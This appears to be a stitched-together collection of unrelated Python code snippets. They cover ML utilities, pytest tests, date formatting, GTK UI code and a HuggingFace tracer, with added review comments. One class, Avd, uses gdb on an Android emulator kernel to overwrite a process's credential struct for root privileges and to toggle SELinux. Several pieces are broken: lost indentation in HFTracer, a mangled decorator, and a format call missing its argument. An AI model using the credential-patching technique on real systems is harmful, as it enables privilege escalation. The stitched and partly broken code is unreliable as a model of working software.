        for split in input_splits_to_eval:
            if (len(self.get_accuracies_of_epoch(tester, split, epoch)) == 0):
                splits_to_eval.append(split)
        return splits_to_eval

    def base_record_group_name(self, tester):
        """Prefix + tester-derived suffix shared by all accuracy tables."""
        base_record_group_name = (('%s_' % self.record_group_name_prefix) if self.record_group_name_prefix else '')
        base_record_group_name += tester.description_suffixes('accuracies')
        return base_record_group_name

    def record_group_name(self, tester, split_name):
        """Table name like '<base>_VAL_vs_TRAIN' (or '..._vs_self')."""
        base_record_group_name = self.base_record_group_name(tester)
        query_set_label = split_name.upper()
        reference_sets_label = '_and_'.join([name.upper() for name in sorted(tester.reference_split_names[split_name])])
        if (reference_sets_label == query_set_label):
            reference_sets_label = 'self'
        return f'{base_record_group_name}_{query_set_label}_vs_{reference_sets_label}'

    def optimizer_custom_attr_func(self, optimizer):
        # Record only the learning rate of the first param group.
        return {'lr': optimizer.param_groups[0]['lr']}
# FIX: the decorator line had lost its `@pytest.mark` prefix, leaving a bare
# `.parametrize(...)` which is a SyntaxError and never parametrized the test.
@pytest.mark.parametrize('message', ['Undefined name `os`', "F821 undefined name 'numpy'", "undefined name 'numpy'"])
def test_autoimport_code_actions_get_correct_module_name(autoimport_workspace, message):
    """The undefined-name module should be parsed out of any linter message format."""
    source = "os.path.join('a', 'b')"
    autoimport_workspace.put_document(DOC_URI, source=source)
    doc = autoimport_workspace.get_document(DOC_URI)
    # Diagnostic range covers the leading `os` token of the source line.
    diagnostic = {'range': {'start': {'line': 0, 'character': 0}, 'end': {'line': 0, 'character': 2}}, 'message': message}
    module_name = get_name_or_module(doc, diagnostic)
    # Clean up the workspace before asserting so a failure doesn't leak state.
    autoimport_workspace.rm_document(DOC_URI)
    assert (module_name == 'os')
def get_date_diff_display(start, end):
    """Return a compact human-readable rendering of the span start..end.

    Progressively collapses shared fields: different years show both full
    dates; same year shows day+month pairs; same day shows only times (for
    datetimes) or the single date (for plain dates).
    """
    if (end.year != start.year):
        return f"{start.strftime('%d %b %Y')} - {end.strftime('%d %b %Y')}"
    if (end.month != start.month):
        return f"{start.strftime('%d %b')} - {end.strftime('%d %b')}, {start.year}"
    if (end.day != start.day):
        return f"{start.strftime('%d')} - {end.strftime('%d')} {start.strftime('%b')}, {start.year}"
    # Same calendar day from here on. BUG FIX: the original test was
    # `isinstance(start, dt.date)`, which is also True for datetime objects
    # (datetime subclasses date), so the time-of-day branches below were
    # unreachable. Only a plain date (no time component) stops here.
    if (not isinstance(start, dt.datetime)):
        return f"{start.strftime('%d %b %Y')}"
    if (end.strftime('%p') != start.strftime('%p')):
        return f"{start.strftime('%I:%M%p')} - {end.strftime('%I:%M%p')}, {start.strftime('%d %b %Y')}"
    # Same AM/PM half: print the marker only once, after the second time.
    return f"{start.strftime('%I:%M')} - {end.strftime('%I:%M')}{start.strftime('%p, %d %b %Y')}"
class OptimizedWildRelNet(tf.keras.Model):
    """Wild Relation Network scoring each candidate answer against a context.

    Pipeline: stack each answer onto the context, add positional encodings,
    apply a relational (pairwise edge) MLP with sum aggregation, reduce over
    objects, and score with a graph MLP.
    """

    def __init__(self, edge_mlp=gin.REQUIRED, graph_mlp=gin.REQUIRED, dropout_in_last_graph_layer=gin.REQUIRED, name='OptimizedWildRelNet', **kwargs):
        super(OptimizedWildRelNet, self).__init__(name=name, **kwargs)

        def dense(units):
            # Shared construction for all hidden Dense layers.
            return tf.keras.layers.Dense(units, activation=get_activation(), kernel_initializer=get_kernel_initializer())

        def sum_over(axis):
            # Fresh Lambda instance each call (layers must not be reused).
            return tf.keras.layers.Lambda(lambda t: tf.reduce_sum(t, axis=axis))

        # Edge MLP applied to every pair of objects.
        self.edge_layer = tf.keras.models.Sequential([dense(units) for units in edge_mlp], 'edge_mlp')
        # Graph MLP producing a single score; optional dropout before the head.
        graph_stack = [dense(units) for units in graph_mlp]
        if dropout_in_last_graph_layer:
            graph_stack.append(tf.keras.layers.Dropout(1.0 - dropout_in_last_graph_layer, noise_shape=[1, 1, graph_mlp[-1]]))
        graph_stack.append(tf.keras.layers.Dense(1, kernel_initializer=get_kernel_initializer()))
        self.graph_layer = tf.keras.models.Sequential(graph_stack, 'graph_mlp')
        self.stacking_layer = relational_layers.StackAnswers()
        self.wildrelnet = tf.keras.models.Sequential([relational_layers.AddPositionalEncoding(), relational_layers.RelationalLayer(self.edge_layer, sum_over(-2)), sum_over(-2), self.graph_layer, sum_over(-1)], 'wildrelnet')

    def call(self, inputs, **kwargs):
        """Score every answer; inputs is (context_embeddings, answer_embeddings)."""
        (context_embeddings, answer_embeddings) = inputs
        stacked = self.stacking_layer([context_embeddings, answer_embeddings])
        return self.wildrelnet(stacked, **kwargs)
def recursively_load_weights(fairseq_model, hf_model):
    """Copy every tensor from a fairseq state dict into the HF model.

    Conv feature-extractor weights go through `load_conv_layer`; everything
    else is matched against `MAPPING` and written with `set_recursively`.
    Weights that match nothing are collected and logged at the end.

    Cleanup: removed a no-op `mapped_key = mapped_key` self-assignment and a
    no-op trailing `continue` from the inner loop (dead code in the original).
    """
    unused_weights = []
    fairseq_dict = fairseq_model.state_dict()
    feature_extractor = hf_model.feature_extractor
    for (name, value) in fairseq_dict.items():
        is_used = False
        if ('conv_layers' in name):
            # Feature-extractor convs have a dedicated, norm-aware loader.
            load_conv_layer(name, value, feature_extractor, unused_weights, (hf_model.config.feat_extract_norm == 'group'))
            is_used = True
        else:
            for (key, mapped_key) in MAPPING.items():
                if (key in name):
                    is_used = True
                    if ('*' in mapped_key):
                        # The layer index precedes the matched key in the
                        # dotted fairseq name; substitute it into the target.
                        layer_index = name.split(key)[0].split('.')[(- 2)]
                        mapped_key = mapped_key.replace('*', layer_index)
                    # Classify the tensor so set_recursively writes the right
                    # attribute; weight_g/weight_v (weight norm) are checked
                    # before the generic 'weight'.
                    if ('weight_g' in name):
                        weight_type = 'weight_g'
                    elif ('weight_v' in name):
                        weight_type = 'weight_v'
                    elif ('weight' in name):
                        weight_type = 'weight'
                    elif ('bias' in name):
                        weight_type = 'bias'
                    else:
                        weight_type = None
                    set_recursively(hf_model, mapped_key, value, name, weight_type)
        if (not is_used):
            unused_weights.append(name)
    logger.warning(f'Unused weights: {unused_weights}')
def sphash(coords: torch.Tensor, offsets: Optional[torch.Tensor]=None) -> torch.Tensor:
    """Hash integer voxel coordinates, optionally combined with kernel offsets.

    `coords` must be an int tensor of shape (N, 4); `offsets`, when given,
    an int tensor of shape (K, 3). Dispatches to the CUDA or CPU backend
    kernel; unknown device types fall back to hashing on CPU and moving the
    result back to the original device.
    """
    assert coords.dtype == torch.int, coords.dtype
    assert coords.ndim == 2 and coords.shape[1] == 4, coords.shape
    coords = coords.contiguous()
    device_type = coords.device.type

    if offsets is None:
        # Plain per-point hash.
        if device_type == 'cuda':
            return torchsparse.backend.hash_cuda(coords)
        if device_type == 'cpu':
            return torchsparse.backend.hash_cpu(coords)
        original_device = coords.device
        return torchsparse.backend.hash_cpu(coords.cpu()).to(original_device)

    # Kernel hash: one hash per (point, offset) combination.
    assert offsets.dtype == torch.int, offsets.dtype
    assert offsets.ndim == 2 and offsets.shape[1] == 3, offsets.shape
    offsets = offsets.contiguous()
    if device_type == 'cuda':
        return torchsparse.backend.kernel_hash_cuda(coords, offsets)
    if device_type == 'cpu':
        return torchsparse.backend.kernel_hash_cpu(coords, offsets)
    original_device = coords.device
    return torchsparse.backend.kernel_hash_cpu(coords.cpu(), offsets.cpu()).to(original_device)
def process_rule_environment_table(c, db_id):
    """Merge the attached 'old' database's rule_environment rows into the main DB.

    Uses the per-database id-mapping tables (rule_map_<db_id>,
    environment_fingerprint_map_<db_id>) built earlier to translate old ids to
    new ones, then records the old->new rule_environment id mapping.

    Args:
        c: sqlite3 cursor with the source DB attached under schema name 'old'.
        db_id: suffix identifying this source DB's temporary mapping tables
            (interpolated into table names, not a user-supplied value).
    """
    # Insert translated rule_environment rows; on a (rule, fingerprint, radius)
    # collision, accumulate num_pairs into the existing row via upsert.
    c.execute('\nINSERT INTO rule_environment (rule_id, environment_fingerprint_id, radius, num_pairs)\n  SELECT rule_map.new_rule_id,\n         environment_fingerprint_map.new_environment_fingerprint_id,\n         old_rule_environment.radius,\n         old_rule_environment.num_pairs\n    FROM old.rule_environment AS old_rule_environment,\n         rule_map_{db_id} AS rule_map,\n         environment_fingerprint_map_{db_id} AS environment_fingerprint_map\n   WHERE old_rule_environment.rule_id = rule_map.old_rule_id\n     AND old_rule_environment.environment_fingerprint_id =\n                environment_fingerprint_map.old_environment_fingerprint_id\n ON CONFLICT (rule_id, environment_fingerprint_id, radius)\n DO UPDATE\n   SET num_pairs = num_pairs + excluded.num_pairs\n        ;\n'.format(db_id=db_id))
    # Record the old->new rule_environment id correspondence by re-joining the
    # freshly inserted rows through the same id-mapping tables.
    c.execute('\nINSERT INTO rule_environment_map_{db_id} (old_rule_environment_id, new_rule_environment_id)\n  SELECT old_rule_environment.id,\n         new_rule_environment.id\n    FROM old.rule_environment AS old_rule_environment,\n         rule_environment AS new_rule_environment,\n         rule_map_{db_id} AS rule_map,\n         environment_fingerprint_map_{db_id} AS environment_fingerprint_map\n   WHERE old_rule_environment.rule_id = rule_map.old_rule_id\n     AND new_rule_environment.rule_id = rule_map.new_rule_id\n     AND old_rule_environment.radius = new_rule_environment.radius\n     AND old_rule_environment.environment_fingerprint_id = \n            environment_fingerprint_map.old_environment_fingerprint_id\n     AND new_rule_environment.environment_fingerprint_id = \n            environment_fingerprint_map.new_environment_fingerprint_id\n'.format(db_id=db_id))
class TestLogFilter():
    """Tests for the ``--logfilter`` command-line option."""

    def test_valid(self, parser):
        # A recognised category is accepted and stored verbatim.
        parsed = parser.parse_args(['--logfilter', 'misc'])
        assert parsed.logfilter == 'misc'

    def test_invalid(self, parser, capsys):
        # An unknown category aborts parsing with a SystemExit and prints the
        # list of valid categories to stderr.
        with pytest.raises(SystemExit):
            parser.parse_args(['--logfilter', 'invalid'])
        (_out, err) = capsys.readouterr()
        print(err)
        assert 'Invalid log category invalid - valid categories' in err
class Rainbow(LedProgram):
    """LED program cycling every device through the full hue circle."""

    def __init__(self, manager: 'DeviceManager') -> None:
        super().__init__(manager, 'Rainbow')
        # Seconds for one complete hue rotation at program_speed == 1.
        self.program_duration = 1
        self.time_passed = 0.0
        # Position within the current rotation, in [0, 1).
        self.current_fraction = 0.0

    def start(self) -> None:
        # Restart the rotation from hue 0.
        self.time_passed = 0.0

    def compute(self) -> None:
        """Advance the cycle by one update tick, scaled by program speed."""
        settings = self.manager.settings
        self.time_passed += (1 / settings['ups']) * settings['program_speed']
        self.time_passed %= self.program_duration
        self.current_fraction = self.time_passed / self.program_duration

    def _colors(self, led_count) -> List[Tuple[(float, float, float)]]:
        # One RGB triple per LED, hues stretched around the current offset.
        hues = stretched_hues(led_count, self.current_fraction)
        return [colorsys.hsv_to_rgb(hue, 1, 1) for hue in hues]

    def ring_colors(self) -> List[Tuple[(float, float, float)]]:
        return self._colors(self.manager.devices.ring.LED_COUNT)

    def wled_colors(self) -> List[Tuple[(float, float, float)]]:
        return self._colors(self.manager.devices.wled.led_count)

    def strip_color(self) -> Tuple[(float, float, float)]:
        # A single-color strip just shows the current hue at full saturation.
        return colorsys.hsv_to_rgb(self.current_fraction, 1, 1)
# FIX: these two lines had lost their `@patch` decorator prefix, leaving bare
# tuple expressions — the mocks were never applied and the annotation-loading /
# __getitem__ code ran for real.
@patch('mmseg.datasets.CustomDataset.load_annotations', MagicMock)
@patch('mmseg.datasets.CustomDataset.__getitem__', MagicMock(side_effect=(lambda idx: idx)))
def test_custom_dataset_custom_palette():
    """A user-supplied palette must be adopted by the dataset unchanged."""
    dataset = CustomDataset(pipeline=[], img_dir=MagicMock(), split=MagicMock(), classes=('bus', 'car'), palette=[[100, 100, 100], [200, 200, 200]], test_mode=True)
    assert (tuple(dataset.PALETTE) == tuple([[100, 100, 100], [200, 200, 200]]))
class VoVGSCSP(nn.Module):
    """VoV-GSCSP cross-stage-partial block built around a GS bottleneck.

    Two 1x1 projections split the input; one branch passes through the GS
    bottleneck, the branches are concatenated and fused by a final 1x1 conv.
    """

    def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5):
        super().__init__()
        hidden = int(c2 * e)  # width of each partial branch
        self.cv1 = Conv(c1, hidden, 1, 1)
        self.cv2 = Conv(c1, hidden, 1, 1)
        self.gsb = GSBottleneck(hidden, hidden, 1, 1)
        # NOTE(review): `res` is never used in forward(); presumably kept for
        # checkpoint/state_dict compatibility — confirm before removing.
        self.res = Conv(hidden, hidden, 3, 1, act=False)
        self.cv3 = Conv(2 * hidden, c2, 1)

    def forward(self, x):
        bottleneck_branch = self.gsb(self.cv1(x))
        bypass_branch = self.cv2(x)
        # Bypass branch first, matching the original concatenation order.
        return self.cv3(torch.cat((bypass_branch, bottleneck_branch), dim=1))
def prepare_env(args, pm, stage, prefix, cmdlist, output=None):
    """Run each setup/teardown command for *stage*, aborting on failure.

    Each entry of `cmdlist` is either a bare command or a list of
    [command, allowed_exit_code, ...]. A command exiting with a code outside
    its allowed set dumps diagnostics and raises PluginMgrTestFail.
    """
    if args.verbose > 0:
        print('{}'.format(prefix))
    for cmdinfo in cmdlist:
        if isinstance(cmdinfo, list):
            cmd, exit_codes = cmdinfo[0], cmdinfo[1:]
        else:
            cmd, exit_codes = cmdinfo, [0]
        if not cmd:
            # Blank entries are permitted and skipped.
            continue
        (proc, foutput) = exec_cmd(args, pm, stage, cmd)
        if not (proc and (proc.returncode not in exit_codes)):
            # Either nothing was executed or it exited acceptably.
            continue
        print('', file=sys.stderr)
        print('{} *** Could not execute: "{}"'.format(prefix, cmd), file=sys.stderr)
        print('\n{} *** Error message: "{}"'.format(prefix, foutput), file=sys.stderr)
        # NOTE(review): this one goes to stdout while its neighbours go to
        # stderr — looks unintentional, but preserved as-is.
        print('returncode {}; expected {}'.format(proc.returncode, exit_codes))
        print('\n{} *** Aborting test run.'.format(prefix), file=sys.stderr)
        # NOTE(review): these headers are formatted with the captured output
        # itself rather than `prefix`; preserved byte-for-byte.
        print('\n\n{} *** stdout ***'.format(proc.stdout), file=sys.stderr)
        print('\n\n{} *** stderr ***'.format(proc.stderr), file=sys.stderr)
        raise PluginMgrTestFail(stage, output, '"{}" did not complete successfully'.format(prefix))
class RaisesContext(ContextManager[_pytest._code.ExceptionInfo[E]]):
    """Context manager behind `pytest.raises`: asserts the `with` body raises
    `expected_exception`, optionally matching `match_expr` against its text."""

    def __init__(self, expected_exception: Union[(Type[E], Tuple[(Type[E], ...)])], message: str, match_expr: Optional[Union[(str, Pattern[str])]]=None) -> None:
        # message: failure text used if the body raises nothing at all.
        self.expected_exception = expected_exception
        self.message = message
        self.match_expr = match_expr
        # Populated in __exit__; handed to the caller via __enter__'s return.
        self.excinfo: Optional[_pytest._code.ExceptionInfo[E]] = None

    def __enter__(self) -> _pytest._code.ExceptionInfo[E]:
        # Return an empty ExceptionInfo now; it is filled on exit.
        self.excinfo = _pytest._code.ExceptionInfo.for_later()
        return self.excinfo

    def __exit__(self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> bool:
        # Hide this frame from pytest tracebacks.
        __tracebackhide__ = True
        if (exc_type is None):
            # No exception raised: that is a test failure.
            fail(self.message)
        assert (self.excinfo is not None)
        if (not issubclass(exc_type, self.expected_exception)):
            # Wrong exception type: returning False lets it propagate.
            return False
        exc_info = cast(Tuple[(Type[E], E, TracebackType)], (exc_type, exc_val, exc_tb))
        self.excinfo.fill_unfilled(exc_info)
        if (self.match_expr is not None):
            # match() itself fails the test if the pattern doesn't match.
            self.excinfo.match(self.match_expr)
        # True suppresses the expected exception.
        return True
def get_exchanges_by_ccy(history=True):
    """Map each currency code to the exchanges that quote it.

    With history=False the static CURRENCIES table is simply inverted; with
    history=True each exchange class is instantiated (by its name via
    globals()) and asked which currencies its history endpoint covers.
    """
    if not history:
        return dictinvert(CURRENCIES)
    supported = {name: globals()[name](None, None).history_ccys() for name in CURRENCIES.keys()}
    return dictinvert(supported)
class SuccessPage(Gtk.Box):
    """Final page of the setup wizard.

    Repurposes the parent window's shared `last_onward` button as a bold
    "Done" button that closes the setup window.
    """

    def __init__(self, parent_window):
        # parent_window: the wizard window owning the shared navigation button
        # (`last_onward`) and the setup window (`setupwin`).
        super().__init__(spacing=10)
        self.__parent_window = parent_window
        self.grid = Gtk.Grid()
        # Bottom button row: a blank, flat placeholder button on the left
        # pushes the Done button to the right edge.
        hbox = Gtk.HBox()
        previous = Gtk.Button(label=' ')
        previous.props.relief = Gtk.ReliefStyle.NONE
        previous.set_margin_end(245)
        hbox.add(previous)
        # Relabel the shared navigation button as a bold "Done" via markup on
        # its child label (set_label('') first clears the plain text).
        self.__parent_window.last_onward.set_label('')
        for child in self.__parent_window.last_onward.get_children():
            child.set_label('<b>Done</b>')
            child.set_use_markup(True)
        self.__parent_window.last_onward.connect('clicked', self.forward)
        hbox.add(self.__parent_window.last_onward)
        hbox.set_hexpand(False)
        hbox.set_vexpand(False)
        hbox.set_margin_bottom(6)
        hbox.set_margin_end(25)
        # Content area: a scrolled window with scrollbars disabled both ways.
        scroller = Gtk.ScrolledWindow()
        scroller.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)
        scroller.set_hexpand(True)
        scroller.set_vexpand(True)
        # NOTE(review): `vbox` is configured but never attached to anything —
        # confirm whether it was meant to be added to `scroller`.
        vbox = Gtk.VBox()
        vbox_container = Gtk.VBox()
        vbox_container.set_margin_top(55)
        vbox_container.set_margin_end(28)
        vbox_container.add(scroller)
        self.grid.set_margin_start(157)
        vbox_container.set_margin_bottom(18)
        vbox.set_margin_end(10)
        vbox.set_margin_bottom(18)
        self.grid.add(vbox_container)
        # Button row sits below the content area, spanning two grid columns.
        self.grid.attach_next_to(hbox, vbox_container, Gtk.PositionType.BOTTOM, 2, 1)
        self.add(self.grid)
        self.__parent_window.last_onward.grab_focus()

    def forward(self, *args):
        """Done-button handler: hide this page and close the setup window."""
        self.hide()
        self.__parent_window.setupwin.close()
def unwrap_yielded(yielded: Union[(Block, dict, Iterable)], **kwargs: Any) -> Generator[(dict, None, None)]:
    """Normalize whatever a generator yielded into a stream of plain dicts.

    Blocks are converted via their item iterator, dicts pass through, and
    other iterables are flattened recursively. The `parent` guard prevents
    infinite recursion on self-iterating values; `root` keeps the original
    object for the error message.
    """
    if isinstance(yielded, Block):
        yield dict(iter(yielded))
        return
    if isinstance(yielded, dict):
        yield yielded
        return
    root = kwargs.get('root', yielded)
    parent = kwargs.get('parent', object())
    if not (isinstance(yielded, Iterable) and (yielded != parent)):
        raise TypeError(f"expected block to be yielded but got {repr(kwargs.get('root', yielded))}")
    for nested in yielded:
        yield from unwrap_yielded(nested, parent=yielded, root=root)
class Avd():
    """Drives a rooted Android emulator via ADB plus gdb attached to the
    guest kernel: walks the kernel task list, patches a process's credential
    struct, and toggles SELinux enforcement."""

    # gdb "python ... end" script walking the circular swapper/init task list;
    # prints "#<task_struct address>;<pid>" per task. The three {} slots are
    # filled with the swapper address and the tasks/pid member offsets.
    _TASKLIST_CMD = ('python', 'a_swapper = {}', 'o_tasks = {}', 'o_pid = {}', "addr = gdb.execute('x/a %d'%(a_swapper + o_tasks), to_string=True).split(':\\t')[1]", 'addr = int(addr, 16) - o_tasks', 'while addr != a_swapper:', " pid = gdb.execute('x/wx %d'%(addr + o_pid), to_string=True).split(':\\t')[1]", " pid = int(pid.replace('\\n', ''), 16)", " print('#%d;%d'%(addr, pid))", " addr = gdb.execute('x/a %d'%(addr + o_tasks), to_string=True).split(':\\t')[1]", ' addr = int(addr, 16) - o_tasks', 'end')
    # Byte offsets of fields inside the cred struct: capability sets below,
    # uid/gid/euid/... above — presumably for a specific kernel layout; verify
    # against the target kernel's struct cred.
    _CAPABILITIES_OFFSETS = [48, 52, 56, 60, 64, 68]
    _IDS_OFFSETS = [4, 8, 12, 16, 20, 24, 28, 32, 36]

    def __init__(self, device: str, host: str, port: int):
        # Lazily-populated pid -> task_struct address map (see tasklist).
        self._tasklist = None
        try:
            self.device = AdbClient(host=host, port=port).device(device)
        except RuntimeError as err:
            raise AVDError(err)
        if (self.device is None):
            raise AVDError("Can't connect to emulator through ADB")

    # NOTE(review): the bare call below looks like a mangled decorator
    # (perhaps `@lru_cache(maxsize=1)` combined with a property, since
    # `kernel` is accessed as `self.kernel` elsewhere). As written it is a
    # NameError at class-body execution — confirm against upstream source.
    _cache(maxsize=1)
    def kernel(self):
        """Load the Kernel helper matching the device's `uname -rm` config."""
        config_name = '{}.yaml'.format(self.device.shell('uname -rm').replace(' ', '_').strip())
        root_path = Path(__file__).resolve().parent.parent
        try:
            kernel = Kernel.load((((root_path / 'config') / 'kernel') / config_name), self.device)
        except FileNotFoundError:
            raise AVDError('Kernel is not supported')
        return kernel

    # NOTE(review): `tasklist` is read as an attribute (`self.tasklist`) in
    # find_process — likely a stripped `@property` decorator; confirm.
    def tasklist(self):
        """Return {pid: task_struct address}, reading kernel memory via gdb."""
        if (self._tasklist is not None):
            return self._tasklist
        debug('Retrieving tasklist from memory')
        cmd = '\n'.join(Avd._TASKLIST_CMD).format(self.kernel.swapper_address, self.kernel.config.task.offset.tasklist, self.kernel.config.task.offset.pid)
        try:
            results = self.kernel.gdb.execute_and_retry(cmd, msg='Wait for kernel memory mapping')
            if (len(results) == 0):
                # Empty result usually means a stale gdbstub; refresh and retry.
                info("Can't retrieve tasklist. Updating gdbstub...")
                self.kernel.gdb.update()
                results = self.kernel.gdb.execute(cmd)
        except GdbError as err:
            raise AVDError(err)
        tasklist = dict()
        for result in results:
            # Each payload line is "#<addr>;<pid>" (see _TASKLIST_CMD).
            (addr, pid) = result.get('payload').replace('\\n', '').replace('#', '', 1).split(';')
            tasklist[int(pid)] = int(addr)
        # Cache only a non-empty result so a failed read can be retried.
        self._tasklist = (tasklist if (len(tasklist) > 0) else None)
        return self._tasklist

    def find_process(self, pid: int):
        """Return the task_struct address of `pid`, or raise AVDError."""
        info(f'Kernel base address found at 0x{self.kernel.base_address:x}')
        tasklist = self.tasklist
        if (tasklist is None):
            raise AVDError("Can't retrieve tasklist from emulator memory")
        paddr = tasklist.get(int(pid))
        if (paddr is None):
            raise AVDError("Can't retrieve process descriptor from tasklist")
        # NOTE(review): duplicate lookup — `paddr` was already fetched above.
        paddr = tasklist.get(int(pid))
        info(f'Process [{pid}] found at 0x{paddr:x}')
        return paddr

    def get_pid(self, pname: str) -> int:
        """Resolve a process name to a single pid (None if not running)."""
        pids = self.device.shell(f'pidof {pname}').replace('\\n', '').split()
        if (len(pids) > 1):
            raise AmbiguousProcessNameError()
        return (int(pids[0]) if (len(pids) > 0) else None)

    def overwrite_credentials(self, pid):
        """Patch the cred struct of `pid` in kernel memory (root escalation)."""
        address = (self.find_process(pid) + self.kernel.config.task.offset.creds)
        # $__ holds the value of the last x/a examine (the creds pointer).
        cmd = [f'x/a {address}', 'set $addr = $__']
        for offset in Avd._CAPABILITIES_OFFSETS:
            # NOTE(review): the format string has two placeholders but only
            # one argument — this raises IndexError at runtime; the capability
            # value (likely full-caps, e.g. 0xffffffff) appears lost. Confirm
            # against upstream and restore the second argument.
            cmd.append('set *(unsigned int*) ($addr + {}) = {}'.format(offset, ))
        for offset in Avd._IDS_OFFSETS:
            # Zero every uid/gid field -> root.
            cmd.append('set *(unsigned int*) ($addr + {}) = {}'.format(offset, 0))
        info(f'Overwriting process [{pid}] credentials')
        self.kernel.gdb.execute('\n'.join(cmd))

    def selinux_setenforce(self, mode: int):
        # Delegates to the kernel helper's enforce setter.
        self.kernel.enforce = mode

    def close(self):
        """Detach gdb, ignoring AVD errors during shutdown."""
        try:
            self.kernel.gdb.exit()
        except AVDError:
            pass
class HFTracer(Tracer):
proxy_buffer_attributes: bool = True
allow_insert_stateless_mods: bool = True
_TORCH_METHODS_TO_PATCH = ['arange', 'zeros', 'ones', 'full', 'full_like', 'eye', 'empty', 'tensor', 'clamp', 'finfo']
    def __init__(self, autowrap_modules=(math,), autowrap_functions=()):
        """Initialize the tracer; fail fast when torch.fx is unavailable.

        autowrap_modules / autowrap_functions are forwarded unchanged to the
        base torch.fx Tracer.
        """
        super().__init__(autowrap_modules=autowrap_modules, autowrap_functions=autowrap_functions)
        if (not is_torch_fx_available()):
            torch_version = version.parse(importlib_metadata.version('torch'))
            raise ImportError(f'Found an incompatible version of torch. Found version {torch_version}, but only version {TORCH_FX_REQUIRED_VERSION} is supported.')
    def _generate_dummy_input(self, model: PreTrainedModel, input_name: str, shape: List[int]) -> Dict[(str, torch.Tensor)]:
        """Build a zero-filled dummy tensor for one forward() argument.

        The dtype/shape are chosen from `input_name` and the model's task
        (looked up through the model-class mapping constants), so tracing can
        run a meta forward pass without real data. Returns a dict mapping the
        input name(s) to tensors on the model's device.
        """
        # Allow retracing of models that were deserialized from another class.
        model_class_name = getattr(model, 'class_for_deserialization', model.__class__).__name__
        device = model.device
        inputs_dict = {}
        if (input_name in ['labels', 'start_positions', 'end_positions']):
            # Label shape depends on the task the model class belongs to.
            batch_size = shape[0]
            if (model_class_name in [*get_values(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING_NAMES), *get_values(MODEL_FOR_MULTIPLE_CHOICE_MAPPING_NAMES), *get_values(MODEL_FOR_IMAGE_CLASSIFICATION_MAPPING_NAMES), *get_values(MODEL_FOR_BACKBONE_MAPPING_NAMES), *get_values(MODEL_FOR_AUDIO_CLASSIFICATION_MAPPING_NAMES)]):
                # One class label per example.
                inputs_dict['labels'] = torch.zeros(batch_size, dtype=torch.long, device=device)
            elif (model_class_name in [*get_values(MODEL_FOR_QUESTION_ANSWERING_MAPPING_NAMES), *get_values(MODEL_FOR_DOCUMENT_QUESTION_ANSWERING_MAPPING_NAMES), 'XLNetForQuestionAnswering']):
                # QA heads take span start/end positions instead of labels.
                inputs_dict['start_positions'] = torch.zeros(batch_size, dtype=torch.long, device=device)
                inputs_dict['end_positions'] = torch.zeros(batch_size, dtype=torch.long, device=device)
            elif (model_class_name in get_values(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING_NAMES)):
                # Sequence classification needs problem_type to pick the dtype.
                if ((not hasattr(model.config, 'problem_type')) or (model.config.problem_type is None)):
                    raise ValueError('Could not retrieve the problem type for the sequence classification task, please set model.config.problem_type to one of the following values: "regression", "single_label_classification", or "multi_label_classification".')
                if (model.config.problem_type == 'regression'):
                    labels_shape = (batch_size, model.config.num_labels)
                    labels_dtype = torch.float32
                elif (model.config.problem_type == 'single_label_classification'):
                    labels_shape = (batch_size,)
                    labels_dtype = torch.long
                elif (model.config.problem_type == 'multi_label_classification'):
                    labels_shape = (batch_size, model.config.num_labels)
                    labels_dtype = torch.float32
                else:
                    raise ValueError(f'Expected model.config.problem_type to be either: "regression", "single_label_classification", or "multi_label_classification", but "{model.config.problem_type}" was provided.')
                inputs_dict['labels'] = torch.zeros(*labels_shape, dtype=labels_dtype, device=device)
            elif (model_class_name in [*get_values(MODEL_FOR_PRETRAINING_MAPPING_NAMES), *get_values(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING_NAMES), *get_values(MODEL_FOR_CAUSAL_LM_MAPPING_NAMES), *get_values(MODEL_FOR_MASKED_LM_MAPPING_NAMES), *get_values(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING_NAMES), *get_values(MODEL_FOR_SEMANTIC_SEGMENTATION_MAPPING_NAMES), 'GPT2DoubleHeadsModel']):
                # Token-level tasks: one label per position, same shape as ids.
                inputs_dict['labels'] = torch.zeros(shape, dtype=torch.long, device=device)
            elif (model_class_name in [*get_values(MODEL_FOR_CTC_MAPPING_NAMES)]):
                inputs_dict['labels'] = torch.zeros(shape, dtype=torch.float32, device=device)
            else:
                raise NotImplementedError(f'Generating the dummy input named {input_name} for {model_class_name} is not supported yet.')
        elif ('pixel_values' in input_name):
            batch_size = shape[0]
            # Image size may live on the top-level config or a nested one.
            image_size = getattr(model.config, 'image_size', None)
            if (image_size is None):
                if hasattr(model.config, 'vision_config'):
                    image_size = model.config.vision_config.image_size
                elif hasattr(model.config, 'encoder'):
                    image_size = model.config.encoder.image_size
                else:
                    image_size = (_generate_random_int(), _generate_random_int())
            num_channels = getattr(model.config, 'num_channels', 3)
            if (not isinstance(image_size, collections.abc.Iterable)):
                image_size = (image_size, image_size)
            (height, width) = image_size
            inputs_dict[input_name] = torch.zeros(batch_size, num_channels, height, width, dtype=torch.float32, device=device)
        elif ('bbox' in input_name):
            # Bounding boxes: 4 coordinates appended to the base shape.
            inputs_dict[input_name] = torch.zeros(*shape, 4, dtype=torch.float, device=device)
        elif ('input_features' in input_name):
            inputs_dict[input_name] = torch.zeros(*shape, model.config.input_feat_per_channel, dtype=torch.float, device=device)
        elif ('visual_feats' in input_name):
            inputs_dict[input_name] = torch.zeros((shape + [model.config.visual_feat_dim]), dtype=torch.float, device=device)
        elif ('visual_pos' in input_name):
            inputs_dict[input_name] = torch.zeros((shape + [model.config.visual_pos_dim]), dtype=torch.float, device=device)
        elif ('inputs' in input_name):
            inputs_dict[input_name] = torch.zeros(*shape, dtype=torch.float, device=device)
        elif ('input_values' in input_name):
            # Raw audio: fabricate a plausible waveform length per batch item.
            (batch_size, _) = shape
            seq_length = _generate_random_int(low=10000, high=20000)
            inputs_dict[input_name] = torch.zeros(batch_size, seq_length, dtype=torch.float, device=device)
        elif (('mask' in input_name) or ('ids' in input_name)):
            inputs_dict[input_name] = torch.zeros(shape, dtype=torch.long, device=device)
        else:
            # Fallback: assume a hidden-state-like float tensor.
            shape_with_hidden_size = (shape + [model.config.hidden_size])
            inputs_dict[input_name] = torch.zeros(shape_with_hidden_size, dtype=torch.float, device=device)
        return inputs_dict
